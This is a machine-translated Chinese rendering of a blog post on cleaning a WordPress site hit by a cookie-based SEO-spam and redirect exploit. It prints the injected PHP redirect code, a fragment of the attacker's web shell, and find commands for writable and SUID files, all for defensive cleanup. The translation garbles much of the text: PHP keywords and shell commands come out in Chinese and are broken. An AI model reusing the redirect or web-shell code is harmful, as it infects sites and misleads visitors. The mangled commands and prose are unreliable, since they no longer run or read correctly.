該博客引起了錯誤...但對我來說,你有嗎?

在過去的一個月中,我已經收到了警告 病毒的博客 在一些遊客。 起初,我忽略了警告,因為我安裝了一個相當不錯的防病毒(Kaspersky AV 2009的),雖然很長一段時間的博客,我從來沒有得到病毒警報(..我看到了可疑的東西,第一次刷新消失。最後...)。
慢慢開始出現大的變化 訪客流量後交通最近一直在穩步下降,並開始被越來越多的人告訴我,誰, stealthsettings.com 這是 病毒之。 我昨天收到從別人做的截圖,當防病毒堵住了 腳本 的stealthsettings.com:木馬Clicker.HTML.IFrame.gr的。 這是相當有說服力的給我,我把所有源搜索。 來到我的腦海的第一個想法是做 升級 最新版本的 WordPress (2.5.1),而不是以前的老腳本刪除WordPress的所有文件,使 備份數據庫。 這個程序沒有產生任何結果,它可能需要很長時間來告訴buba在哪裡,如果它沒有說出來的話 邊喝咖啡邊討論,他發現 谷歌,這將是很好看他。
MyDigitalLife.info發表了一篇題為“WordPress的哈克:恢復和修復谷歌搜索引擎或無Cookie的流量重定向到你的Needs.info,AnyResults.Net金Info.net和其他非法網站“這就是我所需要的線程結束。
這是關於一個 利用 基於WordPress的餅乾,我認為這是非常複雜的,言書。 聰明足以讓 SQL注入 數據庫的博客, 創建一個不可見的用戶 一個簡單的例行檢查 我的帳戶 - >用戶, 檢查服務器“可寫的目錄和文件” (用chmod 777的),尋求和 執行 文件的root用戶或組的權限。 我不知道誰剝削的名稱和看他寫的文章,有幾個儘管許多博客被感染,包括羅馬尼亞。 好吧...我會盡量嘗試解釋泛泛的病毒。

是什麼病毒?

首先,將源頁面的博客,遊客看不見,但可見的和可轉位的搜索引擎,尤其是谷歌的鏈接。 如此 把網頁排名的網站的攻擊者表示。 其次,插入一個 重定向代碼 URL,雅虎,谷歌,現場為遊客來自或RSS閱讀器,而不是網站 餅乾。 一 殺毒軟件 檢測重定向 木馬Clicker.HTML的.

症狀:

大規模遊客流量下降特別是其中大部分遊客來自谷歌的博客。

鑑別: (因此成了問題,誰也不知道如何如何的phpmyadmin,PHP和Linux)

LA。 注意! 首先做一個備份的數據庫!

1。 查看源文件 的index.php, header.php文件, footer.php文件博客話題,看看是否有一個代碼,使用加密 base64 或包含“如果($ SER ==”1·&& sizeof($ _COOKIE)的== 0)“的形式:

<?PHP的
$ Seref =陣列(“谷歌”,“MSN”,“活”,“AltaVista的”,
“問”,“雅虎”,“美國在線”,“CNN”,“天氣”,“Alexa的”);
$ SER = 0;的foreach($ $ Seref文獻)
如果(strpos(用strtolower
($ _SERVER ['HTTP_REFERER']),$ REF)!== FALSE){$ SER =“1;打破;}
($服務==“1?&&大小($ _COOKIE)== 0){頭(人:”位置“。base64_decode(”YW55cmVzdWx0cy5uZXQ =')'/')退出;
}>

或者什麼的。 刪除此代碼!

點擊圖片...

指數代碼

在上面的截圖中,我選擇了錯誤,“<?的腓get_header();?>”。 該代碼應維持不變。

2。 使用 phpMyAdmin的 並去到數據庫表 wp_users凡檢查,如果沒有創建的用戶名 00:00:00 0000-00-00 (可能的放置 用user_login 寫“WordPress的”。 寫這個用戶ID(域ID),然後將其刪除。

點擊圖片...

假用戶

*綠線應該除掉,並保留了他的身份證。 的情況下 ID = 8 .

3。 轉到表 wp_usermeta,在哪裡 位於消除 線的編號(在該字段 USER_ID 刪除ID值出現)。

4。 在表 wp_optionactive_plugins 和插件啟用嫌疑。 它可以用來像結局 _old.giff,_old.pngg _old.jpeg,_new.php.giff使用_old和_new偽裝圖像擴展的組合等。

SELECT * FROM wp_options WHERE的option_name ='active_plugins

刪除這個插件,然後去博客 - >“面板 - >插件,停用和激活某個插件。

點擊圖片出現active_plugins病毒文件。

插入

按照路徑上的FTP或SSH在active_plugins表示從服務器刪除該文件。

5。 在phpMyAdmin,表 wp_option,查找並刪除行“rss_f541b3abd05e7962fcab37737f40fad8“而在”internal_links_cache“.
在internal_links_cache的加密的垃圾鏈接出現在您的博客和 谷歌的Adsense代碼黑客。

6。 推薦 更改密碼 博客和登錄 刪除所有可疑userele。 升級到最新版本的WordPress的博客設置不允許新用戶註冊。 有沒有損失,無法發表評論和不合邏輯的。

我在上面嘗試解釋了在這種情況下從這種病毒中清除博客的程度。 問題比看上去要糟糕得多,甚至沒有解決,因為它被使用了 安全漏洞 Web服務器託管,這是博客。

具有訪問權限的安全性,作為第一項措施 SSH,在服務器上進行一些檢查,看看是否有任何文件,如_old *和* _new *結局。吉夫,JPEG,pngg。jpgg。 必須將這些文件刪除。 如果重命名文件,例如。 top_right_old.giff in top_right_old.php我們可以看到,該文件是完全的攻擊代碼服務器。

一些有用的提示,用於檢查,清理和保護服務器。 (通過SSH)

1. CD / tmp目錄 並檢查是否有文件夾,如 tmpVFlma 或其他組合有相同的名稱,並刪除它。 請看下面的截圖,從我的兩個這樣的文件夾:

tmpserver

使用rm-rf文件夾

2。 盡可能文件夾屬性,檢查elimiati(CHMOD變化) CHMOD 777的

找到所有可寫的 files在當前目錄中: 查找。 型F燙髮2-LS
在當前目錄中找到所有可寫目錄: 查找。 D型燙髮2 LS
找到所有可寫目錄並 files在當前目錄中: 查找。 彼爾姆2 LS

3。 尋找可疑文件服務器上的。

查找。 名稱“* _new.php *”
查找。 名稱“* _old.php *”
查找。 名稱“*。Jpgg”
查找。 名稱“* _giff”
查找。 名稱“* _pngg”

4, 注意! 的文件將被置位 SUID si SGID. 這些文件的用戶(組)或根,而不是執行文件的用戶的權限執行。 這些文件會導致根妥協,如果安全問題。 如果您使用的文件的SUID和SGID位,執行“CHMOD 0“ 或卸載包包含。

利用包含在源某處...:

(安全模式){
(操作系統類型=='nix的'的){
$ OS =執行('kern.ostype的sysctl-N');
OS。=執行(sysctl的-N kern.osrelease的);
$ OS =執行('kernel.ostype的sysctl-N');
OS。=執行(sysctl的-N kernel.osrelease的);
如果(空(用戶))$ USER =執行(“ID”);
別名=陣列(
“=>”,
'找到蘇伊德 files'=>'查找/-類型f -perm -04000 -ls',
'發現sgid files'=>'查找/-類型f -perm -02000 -ls',
'發現所有可寫 files在當前目錄“ =>”中找到。 -f -perm -2 -ls',
'尋找當前目錄'=>'找到所有可寫目錄中。 型D-燙髮2'',
'找到所有可寫目錄並 files在當前目錄“ =>”中找到。 -燙髮-2 -ls',
“顯示打開的端口'=>'NETSTAT-| grep的,我聽',
);
} {
$ OS_NAME使用。=執行('版本');
用戶。=執行(“迴聲%用戶名%');
別名=陣列(
“=>”,
“顯示乳寧服務'=>'網絡啟動”
'顯示進程列表'=>'任務列表“
);
}

在這種方式...基本上發現的安全漏洞。 端口打開目錄“可寫”和組執行權限的文件/根。

返回更多...

感染一些博客: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro /博客,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

,Www.artistul.ro /博客/

www.mirabilismedia.ro /博客,Blog.einvest.ro
......這樣的例子不勝枚舉......很多。

你可以檢查,如果博客是病毒,使用谷歌搜索引擎。 複製和粘貼:

網站www.blegoo.com採購

晚安,提高工作;)不久,我會想出更新尤金 prevezibil.imprevizibil.com.

BRB :)

:注意! 更改WordPress主題或升級到WordPress的2.5.1,不是一個解決辦法擺脫這種病毒。

該博客引起了錯誤...但對我來說,你有嗎?

關於作者

隱身

我熱衷於對涉及小工具和IT的一切事物,我很高興在2006上的secretthsettings.com上撰文,也很高興與您一起發現有關計算機和macOS,Linux操作系統, Windows,iOS和Android。

發表評論